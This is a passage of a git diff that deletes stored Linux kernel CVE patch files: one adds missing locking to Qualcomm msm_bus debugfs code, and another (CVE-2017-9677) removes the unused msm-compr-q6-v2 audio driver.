-+				res = -EINVAL;
-+				goto out;
-+			}
-+			clid = cldata->clid;
- 			break;
- 		}
- 	}
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 
- 	if (found)
--		msm_bus_dbg_update_request(cldata, index);
-+		msm_bus_scale_client_update_request(clid, index);
-+
-+out:
- 	kfree(buf);
--	return cnt;
-+	return res;
- }
- 
- /**
-@@ -599,8 +635,10 @@ static ssize_t fabric_data_read(struct file *file, char __user *buf,
- 			break;
- 		}
- 	}
--	if (!found)
-+	if (!found) {
-+		mutex_unlock(&msm_bus_dbg_fablist_lock);
- 		return -ENOENT;
-+	}
- 	bsize = fablist->size;
- 	ret = simple_read_from_buffer(buf, count, ppos,
- 		fablist->buffer, bsize);
-@@ -689,8 +727,10 @@ static int msm_bus_dbg_fill_fab_buffer(const char *fabname,
- 			break;
- 		}
- 	}
--	if (!found)
-+	if (!found) {
-+		mutex_unlock(&msm_bus_dbg_fablist_lock);
- 		return -ENOENT;
-+	}
- 
- 	if (fablist->file == NULL) {
- 		MSM_BUS_DBG("Fabric dbg entry does not exist\n");
-@@ -741,6 +781,8 @@ static ssize_t msm_bus_dbg_dump_clients_read(struct file *file,
- 		"\nDumping curent client votes to trace log\n");
- 	if (*ppos)
- 		goto exit_dump_clients_read;
-+
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if (IS_ERR_OR_NULL(cldata->pdata))
- 			continue;
-@@ -756,6 +798,7 @@ static ssize_t msm_bus_dbg_dump_clients_read(struct file *file,
- 			cldata->pdata->active_only);
- 		}
- 	}
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- exit_dump_clients_read:
- 	return simple_read_from_buffer(buf, count, ppos, msg, cnt);
- }
-@@ -880,6 +923,7 @@ static int __init msm_bus_debugfs_init(void)
- 		goto err;
- 	}
- 
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry(cldata, &cl_list, list) {
- 		if (cldata->pdata) {
- 			if (cldata->pdata->name == NULL) {
-@@ -899,6 +943,7 @@ static int __init msm_bus_debugfs_init(void)
- 							&client_data_fops);
- 		}
- 	}
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
- 
- 	if (debugfs_create_file("dump_clients", S_IRUGO | S_IWUSR,
- 		clients, NULL, &msm_bus_dbg_dump_clients_fops) == NULL)
-@@ -911,6 +956,7 @@ static int __init msm_bus_debugfs_init(void)
- 		if (fablist->file == NULL) {
- 			MSM_BUS_DBG("Cannot create files for commit data\n");
- 			kfree(rules_buf);
-+			mutex_unlock(&msm_bus_dbg_fablist_lock);
- 			goto err;
- 		}
- 	}
-@@ -930,10 +976,14 @@ static void __exit msm_bus_dbg_teardown(void)
- 	struct msm_bus_cldata *cldata = NULL, *cldata_temp;
- 
- 	debugfs_remove_recursive(dir);
-+
-+	rt_mutex_lock(&msm_bus_dbg_cllist_lock);
- 	list_for_each_entry_safe(cldata, cldata_temp, &cl_list, list) {
- 		list_del(&cldata->list);
- 		kfree(cldata);
- 	}
-+	rt_mutex_unlock(&msm_bus_dbg_cllist_lock);
-+
- 	mutex_lock(&msm_bus_dbg_fablist_lock);
- 	list_for_each_entry_safe(fablist, fablist_temp, &fabdata_list, list) {
- 		list_del(&fablist->list);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9677/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-9677/3.10/0001.patch
deleted file mode 100644
index a367d6ff..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9677/3.10/0001.patch
+++ /dev/null
@@ -1,1858 +0,0 @@
-From b62291edb424281ed31a4e15140b16972ce9eef1 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Thu, 27 Apr 2017 14:44:25 +0800
-Subject: ASoC: msm: remove unused msm-compr-q6-v2
-
-msm-compr-q6-v2.c and msm-compr-q6-v2.h are no longer used.
-
-CRs-Fixed: 2022953
-Bug: 62379475
-Change-Id: I856d90a212a3e123a2c8b80092aff003f7c608c7
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
----
- sound/soc/msm/apq8084-i2s.c             |    2 +-
- sound/soc/msm/apq8084.c                 |    2 +-
- sound/soc/msm/msm8226.c                 |    2 +-
- sound/soc/msm/msm8974.c                 |    2 +-
- sound/soc/msm/msm8994.c                 |    2 +-
- sound/soc/msm/qdsp6v2/Makefile          |    2 +-
- sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 1707 -------------------------------
- sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h |   36 -
- 8 files changed, 6 insertions(+), 1749 deletions(-)
- delete mode 100644 sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
- delete mode 100644 sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h
-
-diff --git a/sound/soc/msm/apq8084-i2s.c b/sound/soc/msm/apq8084-i2s.c
-index 794aa25..5897e9c 100644
---- a/sound/soc/msm/apq8084-i2s.c
-+++ b/sound/soc/msm/apq8084-i2s.c
-@@ -1826,7 +1826,7 @@ static struct snd_soc_dai_link apq8084_dai_links[] = {
- 		.name = "APQ8084 Compr8",
- 		.stream_name = "COMPR8",
- 		.cpu_dai_name	= "MultiMedia8",
--		.platform_name  = "msm-compr-dsp",
-+		.platform_name  = "msm-compress-dsp",
- 		.dynamic = 1,
- 		.trigger = {SND_SOC_DPCM_TRIGGER_POST,
- 			 SND_SOC_DPCM_TRIGGER_POST},
-diff --git a/sound/soc/msm/apq8084.c b/sound/soc/msm/apq8084.c
-index aa2e25f..2b02e5d 100644
---- a/sound/soc/msm/apq8084.c
-+++ b/sound/soc/msm/apq8084.c
-@@ -3046,7 +3046,7 @@ static struct snd_soc_dai_link apq8084_common_dai_links[] = {
- 		.name = "APQ8084 Compr8",
- 		.stream_name = "COMPR8",
- 		.cpu_dai_name	= "MultiMedia8",
--		.platform_name  = "msm-compr-dsp",
-+		.platform_name  = "msm-compress-dsp",
- 		.dynamic = 1,
- 		.async_ops = ASYNC_DPCM_SND_SOC_PREPARE
- 			| ASYNC_DPCM_SND_SOC_HW_PARAMS,
-diff --git a/sound/soc/msm/msm8226.c b/sound/soc/msm/msm8226.c
-index 4095c12..113d77b 100644
---- a/sound/soc/msm/msm8226.c
-+++ b/sound/soc/msm/msm8226.c
-@@ -1495,7 +1495,7 @@ static struct snd_soc_dai_link msm8226_common_dai[] = {
- 		.name = "MSM8226 Compr8",
- 		.stream_name = "COMPR8",
- 		.cpu_dai_name   = "MultiMedia8",
--		.platform_name  = "msm-compr-dsp",
-+		.platform_name  = "msm-compress-dsp",
- 		.dynamic = 1,
- 		.trigger = {SND_SOC_DPCM_TRIGGER_POST,
- 			SND_SOC_DPCM_TRIGGER_POST},
-diff --git a/sound/soc/msm/msm8974.c b/sound/soc/msm/msm8974.c
-index fd69611..4cfd7c3 100644
---- a/sound/soc/msm/msm8974.c
-+++ b/sound/soc/msm/msm8974.c
-@@ -2164,7 +2164,7 @@ static struct snd_soc_dai_link msm8974_common_dai_links[] = {
- 		.name = "MSM8974 Compr8",
- 		.stream_name = "COMPR8",
- 		.cpu_dai_name	= "MultiMedia8",
--		.platform_name  = "msm-compr-dsp",
-+		.platform_name  = "msm-compress-dsp",
- 		.dynamic = 1,
- 		.trigger = {SND_SOC_DPCM_TRIGGER_POST,
- 			 SND_SOC_DPCM_TRIGGER_POST},
-diff --git a/sound/soc/msm/msm8994.c b/sound/soc/msm/msm8994.c
-index 1285c59..8678fb1 100644
---- a/sound/soc/msm/msm8994.c
-+++ b/sound/soc/msm/msm8994.c
-@@ -2684,7 +2684,7 @@ static struct snd_soc_dai_link msm8994_common_dai_links[] = {
- 		.name = "MSM8994 Compr8",
- 		.stream_name = "COMPR8",
- 		.cpu_dai_name = "MultiMedia8",
--		.platform_name = "msm-compr-dsp",
-+		.platform_name = "msm-compress-dsp",
- 		.dynamic = 1,
- 		.trigger = {SND_SOC_DPCM_TRIGGER_POST,
- 			 SND_SOC_DPCM_TRIGGER_POST},
-diff --git a/sound/soc/msm/qdsp6v2/Makefile b/sound/soc/msm/qdsp6v2/Makefile
-index 5865eb9..41f3984 100644
---- a/sound/soc/msm/qdsp6v2/Makefile
-+++ b/sound/soc/msm/qdsp6v2/Makefile
-@@ -1,5 +1,5 @@
- snd-soc-qdsp6v2-objs += msm-dai-q6-v2.o msm-pcm-q6-v2.o msm-pcm-routing-v2.o \
--			msm-compress-q6-v2.o msm-compr-q6-v2.o \
-+			msm-compress-q6-v2.o \
- 			msm-pcm-lpa-v2.o \
- 			msm-pcm-afe-v2.o msm-pcm-voip-v2.o \
- 			msm-pcm-voice-v2.o msm-dai-q6-hdmi-v2.o \
-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-deleted file mode 100644
-index 5fe5f24..0000000
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-+++ /dev/null
-@@ -1,1707 +0,0 @@
--/* Copyright (c) 2012-2014, 2016 The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-- * GNU General Public License for more details.
-- */
--
--
--#include <linux/init.h>
--#include <linux/err.h>
--#include <linux/module.h>
--#include <linux/moduleparam.h>
--#include <linux/time.h>
--#include <linux/wait.h>
--#include <linux/platform_device.h>
--#include <linux/slab.h>
--#include <sound/core.h>
--#include <sound/soc.h>
--#include <sound/soc-dapm.h>
--#include <sound/pcm.h>
--#include <sound/initval.h>
--#include <sound/control.h>
--#include <sound/q6asm-v2.h>
--#include <sound/pcm_params.h>
--#include <asm/dma.h>
--#include <linux/dma-mapping.h>
--#include <linux/msm_audio_ion.h>
--
--#include <sound/timer.h>
--
--#include "msm-compr-q6-v2.h"
--#include "msm-pcm-routing-v2.h"
--#include "audio_ocmem.h"
--#include <sound/tlv.h>
--
--#define COMPRE_CAPTURE_NUM_PERIODS	16
--/* Allocate the worst case frame size for compressed audio */
--#define COMPRE_CAPTURE_HEADER_SIZE	(sizeof(struct snd_compr_audio_info))
--/* Changing period size to 4032. 4032 will make sure COMPRE_CAPTURE_PERIOD_SIZE
-- * is 4096 with meta data size of 64 and MAX_NUM_FRAMES_PER_BUFFER 1
-- */
--#define COMPRE_CAPTURE_MAX_FRAME_SIZE	(4032)
--#define COMPRE_CAPTURE_PERIOD_SIZE	((COMPRE_CAPTURE_MAX_FRAME_SIZE + \
--					  COMPRE_CAPTURE_HEADER_SIZE) * \
--					  MAX_NUM_FRAMES_PER_BUFFER)
--#define COMPRE_OUTPUT_METADATA_SIZE	(sizeof(struct output_meta_data_st))
--#define COMPRESSED_LR_VOL_MAX_STEPS	0x20002000
--
--#define MAX_AC3_PARAM_SIZE		(18*2*sizeof(int))
--#define AMR_WB_BAND_MODE 8
--#define AMR_WB_DTX_MODE 0
--
--
--const DECLARE_TLV_DB_LINEAR(compr_rx_vol_gain, 0,
--			    COMPRESSED_LR_VOL_MAX_STEPS);
--struct snd_msm {
--	atomic_t audio_ocmem_req;
--};
--static struct snd_msm compressed_audio;
--
--static struct audio_locks the_locks;
--
--static struct snd_pcm_hardware msm_compr_hardware_capture = {
--	.info =		 (SNDRV_PCM_INFO_MMAP |
--				SNDRV_PCM_INFO_BLOCK_TRANSFER |
--				SNDRV_PCM_INFO_MMAP_VALID |
--				SNDRV_PCM_INFO_INTERLEAVED |
--				SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
--	.formats =	      SNDRV_PCM_FMTBIT_S16_LE,
--	.rates =		SNDRV_PCM_RATE_8000_48000,
--	.rate_min =	     8000,
--	.rate_max =	     48000,
--	.channels_min =	 1,
--	.channels_max =	 8,
--	.buffer_bytes_max =
--		COMPRE_CAPTURE_PERIOD_SIZE * COMPRE_CAPTURE_NUM_PERIODS ,
--	.period_bytes_min =	COMPRE_CAPTURE_PERIOD_SIZE,
--	.period_bytes_max = COMPRE_CAPTURE_PERIOD_SIZE,
--	.periods_min =	  COMPRE_CAPTURE_NUM_PERIODS,
--	.periods_max =	  COMPRE_CAPTURE_NUM_PERIODS,
--	.fifo_size =	    0,
--};
--
--static struct snd_pcm_hardware msm_compr_hardware_playback = {
--	.info =		 (SNDRV_PCM_INFO_MMAP |
--				SNDRV_PCM_INFO_BLOCK_TRANSFER |
--				SNDRV_PCM_INFO_MMAP_VALID |
--				SNDRV_PCM_INFO_INTERLEAVED |
--				SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
--	.formats =	      SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE,
--	.rates =		SNDRV_PCM_RATE_8000_48000 | SNDRV_PCM_RATE_KNOT,
--	.rate_min =	     8000,
--	.rate_max =	     48000,
--	.channels_min =	 1,
--	.channels_max =	 8,
--	.buffer_bytes_max =     1024 * 1024,
--	.period_bytes_min =	128 * 1024,
--	.period_bytes_max =     256 * 1024,
--	.periods_min =	  4,
--	.periods_max =	  8,
--	.fifo_size =	    0,
--};
--
--/* Conventional and unconventional sample rate supported */
--static unsigned int supported_sample_rates[] = {
--	8000, 11025, 12000, 16000, 22050, 24000, 32000, 44100, 48000
--};
--
--/* Add supported codecs for compress capture path */
--static uint32_t supported_compr_capture_codecs[] = {
--	SND_AUDIOCODEC_AMRWB
--};
--
--static struct snd_pcm_hw_constraint_list constraints_sample_rates = {
--	.count = ARRAY_SIZE(supported_sample_rates),
--	.list = supported_sample_rates,
--	.mask = 0,
--};
--
--static bool msm_compr_capture_codecs(uint32_t req_codec)
--{
--	int i;
--	pr_debug("%s req_codec:%d\n", __func__, req_codec);
--	if (req_codec == 0)
--		return false;
--	for (i = 0; i < ARRAY_SIZE(supported_compr_capture_codecs); i++) {
--		if (req_codec == supported_compr_capture_codecs[i])
--			return true;
--	}
--	return false;
--}
--
--static void compr_event_handler(uint32_t opcode,
--		uint32_t token, uint32_t *payload, void *priv)
--{
--	struct compr_audio *compr = priv;
--	struct msm_audio *prtd = &compr->prtd;
--	struct snd_pcm_substream *substream = prtd->substream;
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct audio_aio_write_param param;
--	struct audio_aio_read_param read_param;
--	struct audio_buffer *buf = NULL;
--	phys_addr_t temp;
--	struct output_meta_data_st output_meta_data;
--	uint32_t *ptrmem = (uint32_t *)payload;
--	int i = 0;
--	int time_stamp_flag = 0;
--	int buffer_length = 0;
--	int stop_playback = 0;
--
--	pr_debug("%s opcode =%08x\n", __func__, opcode);
--	switch (opcode) {
--	case ASM_DATA_EVENT_WRITE_DONE_V2: {
--		uint32_t *ptrmem = (uint32_t *)&param;
--		pr_debug("ASM_DATA_EVENT_WRITE_DONE\n");
--		pr_debug("Buffer Consumed = 0x%08x\n", *ptrmem);
--		prtd->pcm_irq_pos += prtd->pcm_count;
--		if (atomic_read(&prtd->start))
--			snd_pcm_period_elapsed(substream);
--		else
--			if (substream->timer_running)
--				snd_timer_interrupt(substream->timer, 1);
--		atomic_inc(&prtd->out_count);
--		wake_up(&the_locks.write_wait);
--		if (!atomic_read(&prtd->start)) {
--			atomic_set(&prtd->pending_buffer, 1);
--			break;
--		} else
--			atomic_set(&prtd->pending_buffer, 0);
--
--		/*
--		 * check for underrun
--		 */
--		snd_pcm_stream_lock_irq(substream);
--		if (runtime->status->hw_ptr >= runtime->control->appl_ptr) {
--			runtime->render_flag |= SNDRV_RENDER_STOPPED;
--			stop_playback = 1;
--		}
--		snd_pcm_stream_unlock_irq(substream);
--
--		if (stop_playback) {
--			pr_err("underrun! render stopped\n");
--			break;
--		}
--
--		buf = prtd->audio_client->port[IN].buf;
--		pr_debug("%s:writing %d bytes of buffer[%d] to dsp 2\n",
--				__func__, prtd->pcm_count, prtd->out_head);
--		temp = buf[0].phys + (prtd->out_head * prtd->pcm_count);
--		pr_debug("%s:writing buffer[%d] from 0x%pa\n",
--			__func__, prtd->out_head, &temp);
--
--		if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE)
--			time_stamp_flag = SET_TIMESTAMP;
--		else
--			time_stamp_flag = NO_TIMESTAMP;
--		memcpy(&output_meta_data, (char *)(buf->data +
--			prtd->out_head * prtd->pcm_count),
--			COMPRE_OUTPUT_METADATA_SIZE);
--
--		buffer_length = output_meta_data.frame_size;
--		pr_debug("meta_data_length: %d, frame_length: %d\n",
--			 output_meta_data.meta_data_length,
--			 output_meta_data.frame_size);
--		pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n",
--			 output_meta_data.timestamp_msw,
--			 output_meta_data.timestamp_lsw);
--		if (buffer_length == 0) {
--			pr_debug("Recieved a zero length buffer-break out");
--			break;
--		}
--		param.paddr = temp + output_meta_data.meta_data_length;
--		param.len = buffer_length;
--		param.msw_ts = output_meta_data.timestamp_msw;
--		param.lsw_ts = output_meta_data.timestamp_lsw;
--		param.flags = time_stamp_flag;
--		param.uid = prtd->session_id;
--		for (i = 0; i < sizeof(struct audio_aio_write_param)/4;
--					i++, ++ptrmem)
--			pr_debug("cmd[%d]=0x%08x\n", i, *ptrmem);
--		if (q6asm_async_write(prtd->audio_client,
--					&param) < 0)
--			pr_err("%s:q6asm_async_write failed\n",
--				__func__);
--		else
--			prtd->out_head =
--				(prtd->out_head + 1) & (runtime->periods - 1);
--		break;
--	}
--	case ASM_DATA_EVENT_RENDERED_EOS:
--		pr_debug("ASM_DATA_CMDRSP_EOS\n");
--		if (atomic_read(&prtd->eos)) {
--			pr_debug("ASM_DATA_CMDRSP_EOS wake up\n");
--			prtd->cmd_ack = 1;
--			wake_up(&the_locks.eos_wait);
--			atomic_set(&prtd->eos, 0);
--		}
--		break;
--	case ASM_DATA_EVENT_READ_DONE_V2: {
--		pr_debug("ASM_DATA_EVENT_READ_DONE\n");
--		pr_debug("buf = %pK, data = 0x%X, *data = %pK,\n"
--			 "prtd->pcm_irq_pos = %d\n",
--				prtd->audio_client->port[OUT].buf,
--			 *(uint32_t *)prtd->audio_client->port[OUT].buf->data,
--				prtd->audio_client->port[OUT].buf->data,
--				prtd->pcm_irq_pos);
--
--		memcpy(prtd->audio_client->port[OUT].buf->data +
--			   prtd->pcm_irq_pos, (ptrmem + READDONE_IDX_SIZE),
--			   COMPRE_CAPTURE_HEADER_SIZE);
--		pr_debug("buf = %pK, updated data = 0x%X, *data = %pK\n",
--				prtd->audio_client->port[OUT].buf,
--			*(uint32_t *)(prtd->audio_client->port[OUT].buf->data +
--				prtd->pcm_irq_pos),
--				prtd->audio_client->port[OUT].buf->data);
--		if (!atomic_read(&prtd->start))
--			break;
--		pr_debug("frame size=%d, buffer = 0x%X\n",
--				ptrmem[READDONE_IDX_SIZE],
--				ptrmem[READDONE_IDX_BUFADD_LSW]);
--		if (ptrmem[READDONE_IDX_SIZE] > COMPRE_CAPTURE_MAX_FRAME_SIZE) {
--			pr_err("Frame length exceeded the max length");
--			break;
--		}
--		buf = prtd->audio_client->port[OUT].buf;
--
--		pr_debug("pcm_irq_pos=%d, buf[0].phys = 0x%pa\n",
--				prtd->pcm_irq_pos, &buf[0].phys);
--		read_param.len = prtd->pcm_count - COMPRE_CAPTURE_HEADER_SIZE;
--		read_param.paddr = buf[0].phys +
--			prtd->pcm_irq_pos + COMPRE_CAPTURE_HEADER_SIZE;
--		prtd->pcm_irq_pos += prtd->pcm_count;
--
--		if (atomic_read(&prtd->start))
--			snd_pcm_period_elapsed(substream);
--
--		q6asm_async_read(prtd->audio_client, &read_param);
--		break;
--	}
--	case APR_BASIC_RSP_RESULT: {
--		switch (payload[0]) {
--		case ASM_SESSION_CMD_RUN_V2: {
--			if (substream->stream
--				!= SNDRV_PCM_STREAM_PLAYBACK) {
--				atomic_set(&prtd->start, 1);
--				break;
--			}
--			if (!atomic_read(&prtd->pending_buffer))
--				break;
--			pr_debug("%s: writing %d bytes of buffer[%d] to dsp\n",
--				__func__, prtd->pcm_count, prtd->out_head);
--			buf = prtd->audio_client->port[IN].buf;
--			pr_debug("%s: writing buffer[%d] from 0x%pa head %d count %d\n",
--				__func__, prtd->out_head, &buf[0].phys,
--				prtd->pcm_count, prtd->out_head);
--			if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE)
--				time_stamp_flag = SET_TIMESTAMP;
--			else
--				time_stamp_flag = NO_TIMESTAMP;
--			memcpy(&output_meta_data, (char *)(buf->data +
--				prtd->out_head * prtd->pcm_count),
--				COMPRE_OUTPUT_METADATA_SIZE);
--			buffer_length = output_meta_data.frame_size;
--			pr_debug("meta_data_length: %d, frame_length: %d\n",
--				 output_meta_data.meta_data_length,
--				 output_meta_data.frame_size);
--			pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n",
--				 output_meta_data.timestamp_msw,
--				 output_meta_data.timestamp_lsw);
--			param.paddr = buf[prtd->out_head].phys
--					+ output_meta_data.meta_data_length;
--			param.len = buffer_length;
--			param.msw_ts = output_meta_data.timestamp_msw;
--			param.lsw_ts = output_meta_data.timestamp_lsw;
--			param.flags = time_stamp_flag;
--			param.uid = prtd->session_id;
--			param.metadata_len = COMPRE_OUTPUT_METADATA_SIZE;
--			if (q6asm_async_write(prtd->audio_client,
--						&param) < 0)
--				pr_err("%s:q6asm_async_write failed\n",
--					__func__);
--			else
--				prtd->out_head =
--					(prtd->out_head + 1)
--					& (runtime->periods - 1);
--			atomic_set(&prtd->pending_buffer, 0);
--		}
--			break;
--		case ASM_STREAM_CMD_FLUSH:
--			pr_debug("ASM_STREAM_CMD_FLUSH\n");
--			prtd->cmd_ack = 1;
--			wake_up(&the_locks.flush_wait);
--			break;
--		default:
--			break;
--		}
--		break;
--	}
--	default:
--		pr_debug("Not Supported Event opcode[0x%x]\n", opcode);
--		break;
--	}
--}
--
--static int msm_compr_send_ddp_cfg(struct audio_client *ac,
--					struct snd_dec_ddp *ddp)
--{
--	int i, rc;
--	pr_debug("%s\n", __func__);
--	for (i = 0; i < ddp->params_length/2; i++) {
--		rc = q6asm_ds1_set_endp_params(ac, ddp->params_id[i],
--						ddp->params_value[i]);
--		if (rc) {
--			pr_err("sending params_id: %d failed\n",
--				ddp->params_id[i]);
--			return rc;
--		}
--	}
--	return 0;
--}
--
--static int msm_compr_playback_prepare(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	struct snd_pcm_hw_params *params;
--	struct asm_aac_cfg aac_cfg;
--	uint16_t bits_per_sample = 16;
--	int ret;
--
--	struct asm_softpause_params softpause = {
--		.enable = SOFT_PAUSE_ENABLE,
--		.period = SOFT_PAUSE_PERIOD,
--		.step = SOFT_PAUSE_STEP,
--		.rampingcurve = SOFT_PAUSE_CURVE_LINEAR,
--	};
--	struct asm_softvolume_params softvol = {
--		.period = SOFT_VOLUME_PERIOD,
--		.step = SOFT_VOLUME_STEP,
--		.rampingcurve = SOFT_VOLUME_CURVE_LINEAR,
--	};
--
--	pr_debug("%s\n", __func__);
--
--	params = &soc_prtd->dpcm[substream->stream].hw_params;
--	if (runtime->format == SNDRV_PCM_FORMAT_S24_LE)
--		bits_per_sample = 24;
--
--	ret = q6asm_open_write_v2(prtd->audio_client,
--			compr->codec, bits_per_sample);
--	if (ret < 0) {
--		pr_err("%s: Session out open failed\n",
--				__func__);
--		return -ENOMEM;
--	}
--	msm_pcm_routing_reg_phy_stream(
--			soc_prtd->dai_link->be_id,
--			prtd->audio_client->perf_mode,
--			prtd->session_id,
--			substream->stream);
--	/*
--	 * the number of channels are required to call volume api
--	 * accoridngly. So, get channels from hw params
--	 */
--	if ((params_channels(params) > 0) &&
--			(params_periods(params) <= runtime->hw.channels_max))
--		prtd->channel_mode = params_channels(params);
--
--	ret = q6asm_set_softpause(prtd->audio_client, &softpause);
--	if (ret < 0)
--		pr_err("%s: Send SoftPause Param failed ret=%d\n",
--				__func__, ret);
--	ret = q6asm_set_softvolume(prtd->audio_client, &softvol);
--	if (ret < 0)
--		pr_err("%s: Send SoftVolume Param failed ret=%d\n",
--				__func__, ret);
--
--	ret = q6asm_set_io_mode(prtd->audio_client,
--			(COMPRESSED_IO | ASYNC_IO_MODE));
--	if (ret < 0) {
--		pr_err("%s: Set IO mode failed\n", __func__);
--		return -ENOMEM;
--	}
--
--	prtd->pcm_size = snd_pcm_lib_buffer_bytes(substream);
--	prtd->pcm_count = snd_pcm_lib_period_bytes(substream);
--	prtd->pcm_irq_pos = 0;
--	/* rate and channels are sent to audio driver */
--	prtd->samp_rate = runtime->rate;
--	prtd->channel_mode = runtime->channels;
--	prtd->out_head = 0;
--	atomic_set(&prtd->out_count, runtime->periods);
--
--	if (prtd->enabled)
--		return 0;
--
--	switch (compr->info.codec_param.codec.id) {
--	case SND_AUDIOCODEC_MP3:
--		/* No media format block for mp3 */
--		break;
--	case SND_AUDIOCODEC_AAC:
--		pr_debug("%s: SND_AUDIOCODEC_AAC\n", __func__);
--		memset(&aac_cfg, 0x0, sizeof(struct asm_aac_cfg));
--		aac_cfg.aot = AAC_ENC_MODE_EAAC_P;
--		aac_cfg.format = 0x03;
--		aac_cfg.ch_cfg = runtime->channels;
--		aac_cfg.sample_rate =  runtime->rate;
--		ret = q6asm_media_format_block_aac(prtd->audio_client,
--					&aac_cfg);
--		if (ret < 0)
--			pr_err("%s: CMD Format block failed\n", __func__);
--		break;
--	case SND_AUDIOCODEC_AC3: {
--		struct snd_dec_ddp *ddp =
--				&compr->info.codec_param.codec.options.ddp;
--		pr_debug("%s: SND_AUDIOCODEC_AC3\n", __func__);
--		ret = msm_compr_send_ddp_cfg(prtd->audio_client, ddp);
--		if (ret < 0)
--			pr_err("%s: DDP CMD CFG failed\n", __func__);
--		break;
--	}
--	case SND_AUDIOCODEC_EAC3: {
--		struct snd_dec_ddp *ddp =
--				&compr->info.codec_param.codec.options.ddp;
--		pr_debug("%s: SND_AUDIOCODEC_EAC3\n", __func__);
--		ret = msm_compr_send_ddp_cfg(prtd->audio_client, ddp);
--		if (ret < 0)
--			pr_err("%s: DDP CMD CFG failed\n", __func__);
--		break;
--	}
--	default:
--		return -EINVAL;
--	}
--
--	prtd->enabled = 1;
--	prtd->cmd_ack = 0;
--	prtd->cmd_interrupt = 0;
--
--	return 0;
--}
--
--static int msm_compr_capture_prepare(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	struct audio_buffer *buf = prtd->audio_client->port[OUT].buf;
--	struct snd_codec *codec = &compr->info.codec_param.codec;
--	struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
--	struct audio_aio_read_param read_param;
--	uint16_t bits_per_sample = 16;
--	int ret = 0;
--	int i;
--
--	prtd->pcm_size = snd_pcm_lib_buffer_bytes(substream);
--	prtd->pcm_count = snd_pcm_lib_period_bytes(substream);
--	prtd->pcm_irq_pos = 0;
--
--	if (runtime->format == SNDRV_PCM_FORMAT_S24_LE)
--		bits_per_sample = 24;
--
--	if (!msm_compr_capture_codecs(
--				compr->info.codec_param.codec.id)) {
--		/*
--		 * request codec invalid or not supported,
--		 * use default compress format
--		 */
--		compr->info.codec_param.codec.id =
--			SND_AUDIOCODEC_AMRWB;
--	}
--	switch (compr->info.codec_param.codec.id) {
--	case SND_AUDIOCODEC_AMRWB:
--		pr_debug("q6asm_open_read(FORMAT_AMRWB)\n");
--		ret = q6asm_open_read(prtd->audio_client,
--				FORMAT_AMRWB);
--		if (ret < 0) {
--			pr_err("%s: compressed Session out open failed\n",
--					__func__);
--			return -ENOMEM;
--		}
--		pr_debug("msm_pcm_routing_reg_phy_stream\n");
--		msm_pcm_routing_reg_phy_stream(
--				soc_prtd->dai_link->be_id,
--				prtd->audio_client->perf_mode,
--				prtd->session_id, substream->stream);
--		break;
--	default:
--		pr_debug("q6asm_open_read_compressed(COMPRESSED_META_DATA_MODE)\n");
--		/*
--		   ret = q6asm_open_read_compressed(prtd->audio_client,
--		   MAX_NUM_FRAMES_PER_BUFFER,
--		   COMPRESSED_META_DATA_MODE);
--		 */
--			ret = -EINVAL;
--			break;
--	}
--
--	if (ret < 0) {
--		pr_err("%s: compressed Session out open failed\n",
--				__func__);
--		return -ENOMEM;
--	}
--
--	ret = q6asm_set_io_mode(prtd->audio_client,
--		(COMPRESSED_IO | ASYNC_IO_MODE));
--		if (ret < 0) {
--			pr_err("%s: Set IO mode failed\n", __func__);
--				return -ENOMEM;
--		}
--
--	if (!msm_compr_capture_codecs(codec->id)) {
--		/*
--		 * request codec invalid or not supported,
--		 * use default compress format
--		 */
--		codec->id = SND_AUDIOCODEC_AMRWB;
--	}
--	/* rate and channels are sent to audio driver */
--	prtd->samp_rate = runtime->rate;
--	prtd->channel_mode = runtime->channels;
--
--	if (prtd->enabled)
--		return ret;
--	read_param.len = prtd->pcm_count;
--
--	switch (codec->id) {
--	case SND_AUDIOCODEC_AMRWB:
--		pr_debug("SND_AUDIOCODEC_AMRWB\n");
--		ret = q6asm_enc_cfg_blk_amrwb(prtd->audio_client,
--			MAX_NUM_FRAMES_PER_BUFFER,
--			/*
--			 * use fixed band mode and dtx mode
--			 * band mode - 23.85 kbps
--			 */
--			AMR_WB_BAND_MODE,
--			/* dtx mode - disable */
--			AMR_WB_DTX_MODE);
